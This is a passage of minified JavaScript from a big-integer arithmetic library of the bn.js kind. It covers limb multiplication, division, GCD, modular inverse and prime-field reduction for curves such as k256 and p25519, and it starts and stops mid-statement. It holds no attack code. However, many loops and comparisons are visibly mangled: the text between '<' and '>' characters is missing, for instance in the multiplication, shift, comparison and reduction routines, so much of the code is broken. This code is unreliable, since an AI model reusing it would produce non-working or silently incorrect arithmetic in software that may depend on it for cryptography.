io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,v.length++),v};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var v,M=this.length+l.length;return v=10===this.length&&10===l.length?D(this,l,f):M<63?p(this,l,f):M<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var v=0,M=0,P=0;P>>26)|0)>>>26,G&=67108863}f.words[P]=X,v=G,G=M}return 0!==v?f.words[P]=v:f.length--,f.strip()}(this,l,f):x(this,l,f),v},S.prototype.makeRBT=function(l){for(var f=new Array(l),v=I.prototype._countBits(l)-1,M=0;M>=1;return M},S.prototype.permute=function(l,f,v,M,P,G){for(var X=0;X>>=1)P++;return 1<>>=13),P>>>=13;for(G=2*f;G>=26,f+=M/67108864|0,f+=P>>>26,this.words[v]=67108863&P}return 0!==f&&(this.words[v]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function A(z){for(var l=new Array(z.bitLength()),f=0;f>>M}return l}(l);if(0===f.length)return new I(1);for(var v=this,M=0;M=0);var P,f=l%26,v=(l-f)/26,M=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==v){for(P=this.length-1;P>=0;P--)this.words[P+v]=this.words[P];for(P=0;P=0),M=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<G)for(this.length-=G,h=0;h=0&&(0!==R||h>=M);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,v){return Q(0===this.negative),this.iushrn(l,f,v)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){Q("number"==typeof l&&l>=0);var f=l%26,v=(l-f)/26;return!(this.length<=v||!(this.words[v]&1<=0);var f=l%26,v=(l-f)/26;return Q(0===this.negative,"imaskn works only with positive numbers"),this.length<=v?this:(0!==f&&v++,this.length=Math.min(v,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if(Q("number"==typeof l),Q(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f>26)-(L/67108864|0),this.words[P+v]=67108863&G}for(;P>26,this.words[P+v]=67108863&G;if(0===X)return this.strip();for(Q(-1===X),X=0,P=0;P>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var v,M=this.clone(),P=l,G=0|P.words[P.length-1];0!=(v=26-this._countBits(G))&&(P=P.ushln(v),M.iushln(v),G=0|P.words[P.length-1]);var h,L=M.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R=0;Z--){var ue=67108864*(0|M.words[P.length+Z])+(0|M.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),M._ishlnsubmul(P,ue,Z);0!==M.negative;)ue--,M.negative=0,M._ishlnsubmul(P,1,Z),M.isZero()||(M.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),M.strip(),"div"!==f&&0!==v&&M.iushrn(v),{div:h||null,mod:M}},I.prototype.divmod=function(l,f,v){return Q(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(M=G.div.neg()),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.iadd(l)),{div:M,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(M=G.div.neg()),{div:M,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var M,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var v=0!==f.div.negative?f.mod.isub(l):f.mod,M=l.ushrn(1),P=l.andln(1),G=v.cmp(M);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){Q(l<=67108863);for(var f=(1<<26)%l,v=0,M=this.length-1;M>=0;M--)v=(f*v+(0|this.words[M]))%l;return v},I.prototype.idivn=function(l){Q(l<=67108863);for(var f=0,v=this.length-1;v>=0;v--){var M=(0|this.words[v])+67108864*f;this.words[v]=M/l|0,f=M%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){Q(0===l.negative),Q(!l.isZero());var f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&v.isEven();)f.iushrn(1),v.iushrn(1),++L;for(var h=v.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(M.isOdd()||P.isOdd())&&(M.iadd(h),P.isub(R)),M.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(v.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(v.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(G),P.isub(X)):(v.isub(f),G.isub(M),X.isub(P))}return{a:G,b:X,gcd:v.iushln(L)}},I.prototype._invmp=function(l){Q(0===l.negative),Q(!l.isZero());var J,f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=v.clone();f.cmpn(1)>0&&v.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)M.isOdd()&&M.iadd(G),M.iushrn(1);for(var h=0,R=1;0==(v.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(v.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(P)):(v.isub(f),P.isub(M))}return(J=0===f.cmpn(1)?M:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),v=l.clone();f.negative=0,v.negative=0;for(var M=0;f.isEven()&&v.isEven();M++)f.iushrn(1),v.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;v.isEven();)v.iushrn(1);var P=f.cmp(v);if(P<0){var G=f;f=v,v=G}else if(0===P||0===v.cmpn(1))break;f.isub(v)}return v.iushln(M)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){Q("number"==typeof l);var f=l%26,v=(l-f)/26,M=1<>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var v,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)v=1;else{f&&(l=-l),Q(l<=67108863,"Number is too big");var M=0|this.words[0];v=M===l?0:Ml.length)return 1;if(this.length=0;v--){var M=0|this.words[v],P=0|l.words[v];if(M!==P){MP&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return Q(!this.red,"Already a number in reduction context"),Q(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return Q(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return Q(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return Q(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return Q(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return Q(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return Q(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return Q(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return Q(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return Q(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return Q(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return Q(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return Q(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return Q(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function B(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){B.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){B.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){B.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){B.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else Q(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}B.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},B.prototype.ireduce=function(l){var v,f=l;do{this.split(f,this.tmp),v=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(v>this.n);var M=v0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},B.prototype.split=function(l,f){l.iushrn(this.n,0,f)},B.prototype.imulK=function(l){return l.imul(this.k)},ae(K,B),K.prototype.split=function(l,f){for(var v=4194303,M=Math.min(l.length,9),P=0;P>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,v=0;v>>=26,l.words[v]=P,f=M}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){Q(0===l.negative,"red works only with positives"),Q(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){Q(0==(l.negative|f.negative),"red works only with positives"),Q(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var v=l.add(f);return v.cmp(this.m)>=0&&v.isub(this.m),v._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var v=l.iadd(f);return v.cmp(this.m)>=0&&v.isub(this.m),v},le.prototype.sub=function(l,f){this._verify2(l,f);var v=l.sub(f);return v.cmpn(0)<0&&v.iadd(this.m),v._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var v=l.isub(f);return v.cmpn(0)<0&&v.iadd(this.m),v},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if(Q(f%2==1),3===f){var v=this.m.add(new I(1)).iushrn(2);return this.pow(l,v)}for(var M=this.m.subn(1),P=0;!M.isZero()&&0===M.andln(1);)P++,M.iushrn(1);Q(!M.isZero());var G=new 